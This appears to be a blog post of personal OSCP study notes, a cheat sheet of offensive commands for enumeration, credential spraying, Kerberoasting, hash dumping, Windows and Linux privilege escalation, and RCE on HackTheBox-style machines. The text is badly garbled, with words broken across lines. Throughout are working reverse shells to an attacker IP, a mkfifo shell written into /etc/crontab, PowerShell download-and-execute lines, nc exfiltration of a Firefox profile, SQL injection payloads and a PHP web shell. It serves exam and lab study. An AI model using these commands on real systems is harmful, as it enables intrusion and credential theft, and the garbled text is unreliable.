OSCP-Per

sonal
Not
es

HeyGuys,i
nthi
spostIam justgoi
ngtocopypast
emynoteswhi
chIcol
l
ect
eddur
ingmyOSCP
j
ourneyf
rom di
ff
erentsour
ces.Feelf
reet
ocoll
aborat
e.

[
*]SSH-22

Tunnel
i
ng

ssh-
L8443:
127.
0.0.
1:8443user
@x.
x.x.
x

Cr
edent
ial
sSpr
ayi
ng

ncr
ack-
Uuser
s.t
xt-
Ppass.
txtssh:
//x
.x.
x.x

[
*]DNS-53

Per
for
m DNSZoneTr
ansf
ercheck

di
gaxf
rx.
x.x.
x

di
gaxf
rvhost
.com @x.
x.x.
x

[
*]TCPDUMP

t
cpdump-
iet
h0i
cmp

[
*]SMB

1.SMBPr
otocol
enumer
ati
on:

nmap-
p445-
-scr
iptsmb-
prot
ocol
sx.
x.x.
x

2.Checkf
orSMBVul
ner
abi
l
ity

nmap-
-scr
iptsmb-
vul
n*x.
x.x.
x

3.Getal
i
stofshar
esav
ail
abl
eonahost

smbcl
i
ent-
Lx.
x.x.
x

4.Connectt
otheshar
e

smbcl
i
ent/
/x.
x.x.
x/Shar
e_Name

5.SMBMapf
orchecki
ngaccessonf
il
eshar
es

smbmap-
Hx.
x.x.
x-uUser
name-
pPasswor
dorsmbmap-
u''
-p'
'-
d'ht
b.l
ocal
'-
Hx.
x.x.
x
6.Downl
oadal
lfi
l
esi
nshar
es:

smbget-
Rsmb:
//x.
x.x.
x/Shar
e-UUser
name

7.Usecr
ackmapexecf
orspr
ayi
ng

cr
ackmapexecsmb10.
10.
10.
175-
uUser
s.t
xt-
pPass.
txt-
-cont
inue-
on-
success

8.Hostsmbser
verbyusi
ngi
mpacket

i
mpacket
-smbser
ver-
smb2suppor
tht
b$(
pwd)

9.Anony
mousl
ogi
nandf
il
eenumer
ati
onusi
ngsmbmap

smbmap-
Hx.
x.x.
x-uanony
mous-
r--
dept
h

[
*]LDAP

1.Basi
cenumer
ati
on

l
dapsear
ch-
x-hht
b.l
ocal
-b"
dc=ht
b,dc=l
ocal
"

2.Checkf
orNul
lenumer
ati
on

l
dapsear
ch-
x-hx.
x.x.
x-D'
'-
w''
-b"
DC=domai
n,
DC=l
ocal
"

[
*]Fi
l
eTr
ansf
ers

1.cer
tut
il

cer
tut
il-
encodef
il
e.zi
pfi
l
e.b64

catf
il
e.b64|
cmd/
cC:
\wi
ndows\
temp\
nc.
exeat
tacker
_IP4444

Andl
ocal
l
y:

nc-
lvp4444>f
il
e.b64/
/Remov
ecer
ti
fi
cat
esmar
ker
sfr
om t
opandbot
tom

sed-
is/
\n/
/gf
il
e.b64/
/Remov
enewl
i
ne

base64-
dfi
l
e.b64>f
il
e.zi
p

2.cer
tut
il-
url
cache-
spl
i
t-fht
tp:
//x.
x.x.
x/nc.
exeC:
\\user
s\publ
i
c\nc.
exe

3.(
New-
Obj
ectNet
.WebCl
i
ent
).
Downl
oadFi
l
e('
htt
p:/
/10.
10.
14.
102:
8000/
test
.t
xt'
,
't
est
.t
xt'
)

4.i
wr-
uri
htt
p:/
/x.
x.x.
x:8080/
nc.
exe-
out
fi
le/
tmp/
nc.
exe
[
*]Vi
rt
ual
Hostscanni
ng

ht
tps:
//gi
thub.
com/
codi
ngo/
VHost
Scan

VHost
Scan-
tlocal
.domai
n-w/
opt
/VHost
Scan/
VHost
Scan/
wor
dli
sts/
vir
tual
-host
scanni
ng.
txt

[
*]I
mpacketScr
ipt

1.GetPasswor
dHashofUserAccount
s:

py
thon3Get
NPUser
s.pyl
ocal
.domai
n/-
dc-
ip10.
10.
10.
175-
request-
user
sfi
l
e=Topr
ovi
deuser
s

l
aterusebel
owcommandt
ocr
ackt
hepasswor
d:

hashcat-
m 18200-
a0Hash.
txt/
usr
/shar
e/wor
dli
sts/
rocky
ou.
txt-
-f
orce

2.Enumer
ateDomai
nUser
s

py
thon3Get
ADUser
s.py-
all
local
.domai
n/User-
dc-
ipx.
x.x.
x

3.Uset
hisscr
iptt
ochecki
fanyuseri
svul
ner
abl
etoker
ber
oast
ing.

Get
User
SPNs.
py-
request-
dc-
ipx.
x.x.
xlocal
.domai
n/user

[
*]MSSQL-1433

1.UseI
mpacketscr
ipt-mssql
cli
ent
.pyf
orl
ogi
n

mssql
cli
ent
.pyuser
@x.
x.x.
x-wi
ndows-
aut
h

2.Usexp_
dir
tree"
\\x.
x.x.
x\doesnt
exi
st"f
orget
ti
ngaUserHashonResponder
.

[
*]Or
acl
e-1521

UseODATt
ool
forat
tacki
ngdat
abase

ht
tps:
//gi
thub.
com/
quent
inhar
dy/
odat

[
*]Redi
s-6379

nmap-
-scr
iptr
edi
s-i
nfo-
sV-
p6379x
.x.
x.x

Ei
therupl
oadawebshel
lorsshkey
sandgetaccesst
othebox.

ht
tps:
//book.
hackt
ri
cks.
xyz
/pent
est
ing/
6379-
pent
est
ing-
redi
s
[
*]Wi
ndows-Pr
ivi
l
egeEscal
ati
onQui
ckWi
ns!

1.CHM Pr
ivescal
ati
on

ht
tps:
//www.
yout
ube.
com/
wat
ch?
v=k7gD4uf
ex9Q

ht
tps:
//gi
st.
git
hub.
com/
mgeeky
/cce31c8602a144d8f
2172a73d510e0e7

2.SAM &SYSTEM

I
fwear
eabl
etodumpbot
hSAM &SYSTEM f
il
e,t
henusef
oll
owi
ngcommandt
odump

hashesoutofi
t.

i
mpacket
-secr
etdump-
sam SAM -
syst
em SYSTEM l
ocal

ThenPASS-
THE-
HASHt
otool
sli
kesmbmaporpsexec

3.Jui
cyPot
ato

Doesn'
twor
konWi
n10andWi
n2019

whoami
/pr
ivt
ocheckf
orf
oll
owi
ngpr
ivi
l
eges:

•SeI
mper
sonat
ePr
ivi
l
ege

•SeAssi
gnPr
imar
yPr
ivi
l
ege

•SeTcbPr
ivi
l
ege

•SeBackupPr
ivi
l
ege

•SeRest
orePr
ivi
l
ege

•SeCr
eat
eTokenPr
ivi
l
ege

•SeLoadDr
iver
Pri
vi
lege

•SeTakeOwner
shi
pPr
ivi
l
ege

•SeDebugPr
ivi
l
ege

ht
tps:
//gi
thub.
com/
ohpe/
jui
cy-
pot
ato

Run

cmdj
uicy
pot
ato.
exe-
t*-
p“Pr
ogr
am t
olaunch”-
l9001

Ref
erenceMachi
ne-Conceal
HTB
4.GPPPasswor
d

UsePower
UP.
ps1i
nor
dert
oext
ractGr
oupPol
i
cyPasswor
ds

5.Pr
ocdump

Dumppr
ocessofser
vicesr
unni
ngl
i
kebr
owser
sinor
dert
oext
ractcr
edent
ial
s.

6.Ker
ber
oast
ingbyusi
ngGet
User
SPNs.
pyI
mpacketScr
ipt

Uset
hisscr
iptt
ochecki
fanyuseri
svul
ner
abl
etoker
ber
oast
ing.

Get
User
SPNs.
py-
request-
dc-
ipx.
x.x.
xdomai
n.ht
b/user

7.Expl
oit
ing“
runas/
sav
ecr
ed"

Usecmdkey/
li
stt
ocheckf
orst
oredcr
edent
ial
s.

$WScr
ipt=New-
Obj
ect-
ComObj
ectWscr
ipt
.Shel
l

$shor
tcut=Get
-Chi
l
dIt
em shor
tcut
.l
nk

$shor
tcut

$Wscr
ipt
.Cr
eat
eShor
tcut
($shor
tcut
)

8.UseMi
mikat
z

Ti
ps:

i
.Ifi
tisget
ti
ngbl
ockbygr
ouppol
i
cy,
sear
chf
orAppl
ockerBy
passl
i
st.

ht
tps:
//gi
thub.
com/
api
0cr
adl
e/Ul
ti
mat
eAppLocker
ByPassLi
st/
blob/
mast
er/
Gener
ic-

AppLocker
bypasses.
md

i
i
.Ift
hisl
i
stdi
dn'
twor
kthengof
ormet
erpr
eterbyusi
ngUni
cor
n.

py
thonuni
cor
n.pywi
ndows/
met
erpr
eter
/rev
erse_
htt
pLHOSTLPORT

I
twi
l
lgener
ate2f
il
es:

a.power
shel
l
_at
tack.
txt-sav
eitasmsf
.ps1

b.uni
cor
n.r
c-uset
hist
oloadmsf
consol
e(msf
consol
e-runi
cor
n.r
c)

Downl
oadandr
unmsf
.ps1onTar
getmachi
ne.
i
i
i.I
funi
cor
nisnotwor
kingt
hengof
orEmpi
re.

Ref
erenceMachi
ne-AccessHTBmachi
ne

9.DPAPI

Downl
oadmast
erkeyf
il
e:c:
\user
s\l
ocal
user
\appdat
a\Roami
ng\
Micr
osof
t\Pr
otect
\x-
x-x-
xxxxx-

xxxxxx\

Downl
oadCr
edent
ial
fil
e:C:
\user
s\l
ocal
user
\appdat
a\Roami
ng\
Micr
osof
t\Cr
edent
ial
s\

Thenony
ourl
ocal
machi
ner
unf
oll
owi
ngcommandonmi
mikat
ztogetamast
erkey
:

mi
mikat
z#dpapi
:
:mast
erkey/
in:
fi
le/
sid:
sid-
of-
cur
rent
-user/
passwor
d:passwor
d-of
cur
rent
-user

I
twi
l
lgi
vey
oumast
erkeyt
henr
unf
oll
owi
ngcommandt
ogetacl
ear
textpasswor
d.

mi
mikat
z#dpapi
:
:cr
ed/
in:
Credent
ial
s-f
il
emi
mikat
z#dpapi
:
:cr
ed/
in:
Credent
ial
s-f
il
e

10.ADRecy
clebi
nDel
etedObj
ect
sRecov
er

Usebel
owcommand:

Get
-ADObj
ect-
fi
lt
er'
i
sdel
eted-
eq$t
rue-
andname-
ne"
Del
etedObj
ect
s"'
-

i
ncl
udeDel
etedObj
ect
s-pr
oper
ty*

Ref
erencel
i
nk:
htt
ps:
//www.
power
admi
n.com/
blog/
rest
ori
ng-
del
eted-
obj
ect
s-f
romact
ive-

di
rect
ory
-usi
ng-
ad-
recy
cle-
bin/

11.Aut
oLogonCr
edent
ial
sReuse

Af
terr
unni
ngPower
Upwemayendupget
ti
ngAut
oLogoncr
edswhi
chwecnusef
or

escal
ati
ngpr
ivi
l
eges

$passwd=Conv
ert
To-
Secur
eSt
ri
ng‘
Passwor
dof
Admi
n’-
AsPl
ainText-
For
ce

$cr
eds=New-
Obj
ectSy
stem.
Management
.Aut
omat
ion.
PSCr
edent
ial
('
admi
nist
rat
or'
$passwd)

Ar
ever
seshel
lcannowbeopenedwi
tht
hesuppl
i
edcr
edsusi
ngf
oll
owi
ngcommand:

St
art
-Pr
ocess-Fil
ePat
h“power
shell
”-argumentli
st“I
EX(New-Object
Net
.WebCl
ient
).downl
oadSt
ri
ng('
htt
p://
x.x.
x.x/
InvokePowershel
l
TCP. ps1'
)”-
Credent
ial
$cr
eds
12.Usecacl
s

TocheckAccessCont
rol
:

Get
-ACLf
il
e.t
xt|
fl*

Thi
swi
l
lal
l
owf
ull
accesst
ofi
l
eifusei
saowneroft
hef
il
e.

cacl
sroot
.t
xt/
t/e/
pUser
:F

13.Per
for
m Passt
heHashusi
ngpt
h-wi
nexe

pt
h-wi
nexe-
Ujeev
es/
Admi
nist
rat
or%NLTMHash/
/Ser
ver
IPcmd

14.MS14-
680

ht
tps:
//gi
thub.
com/
SecWi
ki
/wi
ndows-
ker
nel
-expl
oit
s/t
ree/
mast
er/
MS14-
068/
pykek

Ref
erenceMachi
ne-Mant
is

15.APLCTaskSchedul
erLPE

ht
tps:
//nv
d.ni
st.
gov
/vul
n/det
ail
/CVE-
2018-
8440

I
nor
dert
orunt
hisexpl
oitweshoul
dhav
eREADEXECUTEAccesst
oAut
hent
icat
ed

User
s

i
cacl
sc:
\Wi
ndows\
Tasksf
older

Machi
neRef
erence-Conceal

[
*]Li
nux-Pr
ivi
l
egeEscal
ati
onQui
ckWi
ns!

1.SSHFi
l
esf
ound:

i
fid_
rsaf
il
efoundt
henusessh2j
ohn.
pyt
ocr
ackt
heency
ptedpasswor
d.

chmod400i
d_r
sa

ssh-
iid_
rsauser
@x.
x.x.
x

2.Lookf
orser
vicesr
unni
ngl
ocal
l
ywhi
char
enotexposedt
othepubl
i
candt
otunnel

t
hem t
oyourbox.
3.Cr
eat
eSSHkey
s:

Thi
swi
l
lcr
eat
euser
.pubanduserf
il
e

ssh-
key
gen-
fuser

chmod600user
.pub

ssh-
iuserl
ocal
user
@x.
x.x.
x

4.Scr
een4.
5.0Local
Pri
vEsc

ht
tps:
//www.
expl
oit
-db.
com/
expl
oit
s/41154

5.Usesudo-
ltocheckwhatcommads/scr
iptwecanexecut
easar
ootuser
.

6.Redhat
/Cent
OSr
oott
hroughnet
wor
k-scr
ipt
s

Commandexecut
ionbysi
mpl
ypr
ovi
dingi
nputspacecommandi
nthescr
ipt
.

ht
tps:
//secl
i
sts.
org/
ful
l
discl
osur
e/2019/
Apr
/24

Ref
erenceMachi
ne-Net
wor
kedHTB

7.Vaul
ttaken

ht
tps:
//www.
vaul
tpr
oject
.i
o/docs/
concept
s/t
okens.
html

Ref
erenceMachi
ne-Cr
aftHTB

8.Logst
ashi
nputasacommand

Ref
erencemachi
ne-Hay
stack

9.Sy
stemCTLSUI
Dexpl
oit
ati
on

10.PATHHi
j
acki
ngusi
ngpspy

Tocheckwhi
chgr
oupouruserbel
ongst
ogr
oups

Tof
indoutf
il
esandf
older
sownedbygr
oup

f
ind/-
groupgr
oup_
name2>/
dev
/nul
l

echo$PATH.

Ref
erenceMachi
ne-Wr
it
eUpHTB
12.Vi
m

sudo/
usr
/bi
n/v
i/v
ar/
www/
html
/any
fil
ewhi
chwecanaccessasar
oot-
c‘:
!/
bin/
bash’

13.Pr
ivEscv
iaLXD

ht
tps:
//r
eboar
e.gi
thub.
io/
lxd/
lxd-
escape.
html

l
xci
nitubunt
u:16.
04bl
ah-
csecur
it
y.pr
ivi
l
eged=t
rue

l
xcconf
igdev
iceaddbl
ahr
ootdi
sksour
ce=/pat
h=/
mnt
/rootr
ecur
siv
e=t
rue

St
eps:

i
.Cr
eat
eaal
pinebui
l
dlocal
l
y.

Li
nk:
htt
ps:
//gi
thub.
com/
saghul
/l
xd-
alpi
ne-
bui
l
der

i
i
.Tr
ansf
ert
ar.
gzf
il
eonr
emot
emachi
ne.

scpy
our
fi
le.
tar
.gzuser
@x.
x.x.
x:

i
i
i.I
mpor
timagei
nthel
xc

l
xci
magei
mpor
tyour
fi
le.
tar
.gzal
pine#i
fthi
sdoesn'
twor
krun

l
xci
magei
mpor
tyour
fi
le.
tar
.gz-
-al
i
asal
pine

i
v.Checki
fiti
simpor
tedornotbyusi
ng

l
xci
magel
i
st

v
.Nowcr
eat
eamachi
ne

l
xci
nital
pinepr
ivesc-
csecur
it
y.pr
ivi
l
eged=t
rue

v
i.l
xcl
i
stt
ovi
ewmachi
ne

v
ii
.Mounthar
ddr
ivet
othemachi
ne

l
xcconf
igdev
iceaddpr
iveschost
-r
ootdi
sksour
ce=/pat
h=/
mnt
/root
/

v
ii
i.St
artt
hecont
ainer

l
xcst
artpr
ivesc

i
x.l
xcexecpr
ivesc/
bin/
sh

Ref
erenceMachi
ne-Cal
ami
ty
14.Modul
eHi
j
acki
ng

I
fabc.
pyscr
ipti
simpor
ti
ngsomemodul
efr
om def
.pyandi
fwehav
ewr
it
eaccesst
o

def
.pywecanper
for
m aModul
eHi
j
acki
ng.

exampl
e,

shel
l=‘
’
'

*****r
ootr
m/t
mp/
f;
mkf
if
o/t
mp/
f;
cat/
tmp/
f|/
bin/
sh-
i2>&1|
n

10.
10.
14.
1114444>/
tmp/
f

‘
’
'

f=open(
'/
etc/
cront
ab,
‘a’
)

f
.wr
it
e(shel
l
)

f
.cl
ose(
)

15.I
nspect
ingMozi
l
laFi
ref
oxPr
ofi
l
e

Checkf
or.
mozi
l
laf
older
.

Gai
nsav
edcr
dent
ial
susi
ngt
ool
sli
ke

f
ir
efox_
decr
ypt-ht
tps:
//gi
thub.
com/
unode/
fir
efox_
decr
ypt

f
ir
epwd-ht
tps:
//gi
thub.
com/
lcl
evy
/fi
repwd

Tr
ansf
erf
il
esas

cd/
tmp

zi
p-rmozi
l
la.
zip~/
.mozi
l
la

ncx.
x.x.
x1234<mozi
l
la.
zip

16.Li
nuxCapabi
l
iti
es

Fort
hepur
poseofper
for
mingper
missi
onchecks,
tradi
ti
onal
UNI
Ximpl
ement
ati
ons

di
sti
ngui
sht
wocat
egor
iesofpr
ocesses:
pri
vi
legedpr
ocesses(
whoseef
fect
iveuserI
D

i
s0,
ref
err
edt
oassuper
userorr
oot
)&unpr
ivi
l
egedpr
ocesses(
whoseef
fect
iveUI
Dis
nonzer
o).Pr
ivi
l
egedpr
ocessesby
passal
lker
nel
per
missi
onchecks,
whi
l
e

unpr
ivi
l
egedpr
ocessesar
esubj
ectt
oful
lper
missi
onchecki
ngbasedont
hepr
ocess'
s

cr
edent
ial
s(usual
l
y:ef
fect
iveUI
D,ef
fect
iveGI
D,andsuppl
ement
arygr
oupl
i
st)
.

Howt
odet
ect
:

get
cap-
r/2>/
dev
/nul
l

I
fyouf
indep(
eff
ect
iveandper
mit
ted)bi
nar
y

t
hengot
ogt
fobi
nsandexpl
oiti
t.

exampl
e,

ht
tps:
//gt
fobi
ns.
git
hub.
io/
gtf
obi
ns/
openssl
/#f
il
e-r
ead

Wi
thFi
l
eReadWr
it
eabi
l
ity
,modi
fysudoer
s

Ref
erenceMachi
ne-Li
ght
wei
ghtHTB

17.Post
greSQL,
PAM andNSS

Enumer
atef
orPasswor
dsunderawebdi
rect
ory/
var
/www/
html
:

gr
ep-
Rpasswor
d

ht
tps:
//ser
ver
faul
t.
com/
quest
ions/
538383/
under
stand-
pam-
and-
nss/
538503#538503

Ref
erenceMachi
ne-RedCr
ossHTB

18.H2Dat
abase

ht
tps:
//mt
hber
nar
des.
git
hub.
io/
rce/
2018/
03/
14/
abusi
ng-
h2-
dat
abase-
ali
as.
html

H2i
sanopensour
cedat
abasemanagementsy
stem wr
it
teni
nJav
a.Cur
lisusedt
o

v
eri
fyt
hatt
hel
ogi
npagei
saccessi
blei
nter
nal
l
y.

cur
l-g-
6‘ht
tp:
//[
::
1]:
8002'

psaux|
greph2#Todet
ectH2DBMSv
ersi
on

19.DockerPr
ivi
l
eges

i
d#Checki
fcur
rentuserbel
ongst
odockergr
oup

dockeri
mages-
-al
l#Rev
eal
sav
ail
abl
eimagesont
hesy
stem.
dockerr
un-
-r
m-v/
:/host
OS-
t1i
mageonboxsh

20.Homer-ApacheCouchDB

Expl
oit
:ht
tps:
//www.
expl
oit
-db.
com/
expl
oit
s/44913

Expl
anat
ion:
htt
ps:
//j
ust
i.
cz/
secur
it
y/2017/
11/
14/
couchdb-
rce-
npm.
html

Howt
odet
ectbyr
unni
ngf
oll
owi
ngcommand:

psaux

[
*]LFI&RFIScenar
io

1.I
fLFIf
oundonsy
stem t
ryt
ofet
chcommonwi
ndowsf
il
eli
ke

/
windows/
syst
em32/
li
cense.
rt
f

/
windows/
pat
her
/unat
tend.
xml

2.I
ncasei
fyouar
enotget
ti
ngany
thi
ngsensi
ti
vei
nfor
mat
ionornotabl
etoexpl
oiti
t,

gof
orRFIbyhost
ingal
ocal
SMBser
verandconf
ir
mitbyr
unni
ngncon445eg.

ht
tp:
//exampl
e.php?
fil
e=\
\10.
10.
14.
111\
htb\
fil
e.t
xt

nc-
lvnp445

I
frecei
vehi
tsonnci
tmeansi
tisv
ulner
abl
etoRFI
.

3.Al
sor
unr
esponderandt
ryt
ogetaNTLMv
2hash

r
esponder-
Iet
h0

4.Uset
cpdumpt
over
if
y

t
cpdump-
iet
h0por
t445

[
*]RCEScenar
io

1.Useni
shang'
sInv
oke-
Power
Shel
l
Tcp.
ps1

2.I
fiti
snotwor
kingt
henchecki
fpower
shel
lCONSTRAI
NEDMODEbyusi
ng

f
oll
owi
ngcommand.

power
shel
l
.exe$Execut
ionCont
ext
.Sessi
onSt
ate.
LanguageMode
3.I
nsuchascenar i
owecandr
opnconser
verv
iaourl
ocal
l
yhost
edsmbser
verandgeta
rev
erseconnect
ion.

\
\10.
10.
14.
111\
htb\
nc.
exe10.
10.
14.
1119001-
epower
shel
l

Al
sowecandr
opnc.
exebyusi
ngf
oll
owi
ngcommand:

power
shel
l(New-
Obj
ectNet
.WebCl
i
ent
).
downl
oadSt
ri
ng(
'ht
tp:
//x.
x.x.
x/nc.
exe'
)orcan

al
souseI
WR

power
shel
lIWR-
uri
htt
p:/
/x.
x.x.
x/nc.
exe-
Out
Fil
eC:
\\Wi
ndows\
\Temp\
\nc.
exe

cmd/
cc:
\\wi
ndows\
\Temp\
\nc.
exex.
x.x.
x9001-
epower
shel
l
.exe

Al
sowecanusebel
owcommand:

power
shel
lwget“
htt
p:/
/x.
x.x.
x/nc.
exe”-
out
fi
le“
nc.
exe”

nc.
exe-
ecmd.
exex.
x.x.
x1234

[
*]SQLI
nject
ionScenar
io

1.UseEXECxpcmdshel
ltoexecut
eacommandv
iaSQLI
nject
ionandt
ryt
ost
eal
a

hashusi
ngr
esponder
.

i
d=1;
EXECxp_
cmdshel
lwhoami
;-
-

or

i
d=1;
decl
are@qv
archar
(200)
;set@q='
\\
x.x.
x.x\
local
shar
e';
exec

mast
er.
dbo.
xp_
dir
tress@q;
--+

2.Usei
ntoout
fi
let
owr
it
eacont
enti
nit
.

ht
tp:
//x.
x.x
.x/
test
.php?
id=-
1uni
onsel
ect1,
l
od_
fil
e('
/et
c/passwd'
),
3,
4,
5int
oout
fi
le‘
/var
/

www/
html
/t
est
.t
xt’

Af
tert
hatv
isi
tht
tp:
//x.
x.x.
x/t
est
.t
xt

Al
socheckdef
aul
t000-
def
aul
t.
confwhi
chi
sunder/
etc/
apache2/
sit
es-
enabl
ed/
000-

daf
eul
t-
conf

al
soonecanachi
eveawebshel
lbyi
nject
ionaphpf
il
e:

<?
phpsy
stem(
$_REQUEST[
"exec"
])
;?>
[
*]LFIt
oRCE

htt
ps:
//www.al
phabot.
com/secur
it
y/bl
og/
2017/
jav
a/Mi
sconf
igur
ed-
JSF-
ViewSt
ates-
canl
ead-
to-
sever
e-RCE-
vul
nerabi
l
iti
es.
html

ht
tps:
//www.
rcesecur
it
y.com/
2017/
08/
from-
lf
i-
to-
rce-
via-
php-
sessi
ons/

[
*]Rev
erseConnect
ionI
ssues

1.I
frev
erseshel
ldi
esi
nst
ant
lyusef
oll
owi
ngcommandt
ochecki
fanysor
tofi
ntr
usi
on

sy
stem i
spr
esentont
hebox.

f
ind/
home-
cti
me-
60#I
twi
l
lgi
val
lfi
l
esmodi
fi
edi
nlast60mi
nut
esonbox

I
nsuchscenar
iocp/
bin/
nct
o/dev
/shm/
newname-r
ewr
it
enct
onewf
il
ename

andt
ryt
oexecut
ethenccommandagai
n.

2.Tr
yli
steni
ngonpor
t80or443.

[
*]SpawnTTY

1.py
thon3-
c'i
mpor
tpt
y;pt
y.spawn(
"/bi
n/sh"
)'

2.echoos.
syst
em(
'/
bin/
bash'
)

3./
bin/
sh-
i

4.per
l—e'
exec"
/bi
n/sh"
;'

5.r
uby
:exec"
/bi
n/sh"

6.l
ua:
os.
execut
e('
/bi
n/sh'
)

7.(
From wi
thi
nIRB)

exec"
/bi
n/sh"

8.(
From wi
thi
nvi
)

:
!bash
9.(
From wi
thi
nvi
)

:
setshel
l
=/bi
n/bash:
shel
l

10.(
From wi
thi
nnmap)

!
sh

ByLat
ishDanawal
e-August14,
2020